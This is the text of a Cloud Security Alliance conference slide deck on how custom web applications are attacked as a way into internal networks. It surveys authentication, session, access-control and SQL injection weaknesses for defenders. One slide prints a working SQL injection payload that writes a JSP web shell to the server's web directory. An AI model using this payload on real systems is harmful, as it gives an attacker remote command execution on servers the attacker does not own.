andrew useckas csa presentation hacking custom webapps 4 3

www.cloudsecurityalliance.org

Custom web applicationsas a way into yourinternal networkAndrew Useckas

Copyright © 2016 Cloud Security Alliance

http://www.cloudsecurityalliance.org/

www.cloudsecurityalliance.orgCopyright © 2011 Cloud Security Alliance www.cloudsecurityalliance.orgCopyright © 2015 Cloud Security Alliance

Introduction

• Securing custom web applications is more challenging than most people realize:

- Security is often overlooked during design and development

- As long as the site is indexed by at least one search engine, it is exposed to hacks, attacks, and full-blown assaults from anywhere in the world

- There’s big money in hacking and web applications are seen as an easy target with potential to use them as a jump board to the internal network or private customer cloud

- No “security patch” for custom WebApps (vs. infrastructure)

• It’s simply not as difficult to compromise a web application as most people think

- You don’t have to be a hacking wiz to exploit most badly written apps – there are plenty of tools out there to help you do it




About Me

• CTO at Threat X working on a new approach to Web Application security.

• Over 15 years of experience in penetration testing / ethical hacking.

• Author and architect of multiple security sensors.• Consulted for multiple enterprises in technical and

compliance aspects of security.




Agenda

• Basic overview of hacker’s mindset.• Overview of most currently popular security measures.• Web Application Attacks

• Authentication• Session Management• Access Controls• Client Side checks• Server Side checks




Who is the target?

• According to Verizon 2016 DBIR Report:• 40% of confirmed breaches were Web App Attacks.• 95% of confirmed WebApp breaches financially

motivated.• Top Industries attacked: Finance, Information,

Retail.• Higher percentage of confirmed data disclosure as

security measures are lacking.• Botnets. Is my company too small to be attacked?• My perimeter is secure – we run quarterly scans.




The wild west of WebApps

• Security is often an afterthought. Time to market is more important than security.

• Developer education on safe coding techniques is lacking.

• Traditional Layer 3 firewall does nothing for WebApp Security.

• IDS / IPS systems do very little as the focus is more on the network applications.

• New ciphers use ephemeral keys making it harder to decrypt and examine the flows at the edge (no more decryption in passive sensors).

• Piping all the logs to a SIEM tool may overwhelm the administrators.

• Most of these tools are useless in a cloud deployment model.




Tools

• Browser – Firefox• Intercepting Proxy – Burpsuite• SQLMap• Target apps – Bodgeit from Google




Authentication

• Login forms are often the first thing a hacker will try to break.

• Common issues:• Weak or default passwords• Default pages• Guessable protected URIs• Navigation tree leaks in JS• Lack of proper server side sanitization




Session Management

• Sessions are used to track users• First line of defense• Common attacks

• Session hijacking• Missing idle session timeouts• Session riding (CSRF)• Cookie manipulation




Access Controls

• Defective access controls are often used after the initial penetration.• Hidden information in HTML• Information leaks through JS• Horizontal privilege escalation• Vertical privilege escalation




Client Side Checks

• Validation of input fields before they are passed to the server

• Usually based on JS• Can be easily bypassed with transparent proxy




Server Side Checks

• Server side usually talking to a database engine such as MySql.

• User input can be passed to the backend scripts without proper validation, resulting in the backend attacks such as SQL injection (SQLi).

• SQLi can be used to• Bypass authentication controls• Bypass access controls• Execute full database dumps• Write script files to the remote file system. Scripts

can then be executed from the browser giving an attacker shell access to the remote system




Further Exploits

• It is possible to upload server side scripts via backends such as MySQL.

• Scripts can then be executed from the browser giving shell access.

• Sample injection:UNION SELECT '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',null INTO OUTFILE '/some/webdir/dir/cmd.jsp'




Parting Recommendations

• Secure development and QA• Next-generation Web Application Firewall• Pen testing




References

• Verizon DBIR report: http://www.verizonenterprise.com/verizon-insights-lab/dbir/



andrew useckas csa presentation hacking custom webapps 4 3

Technology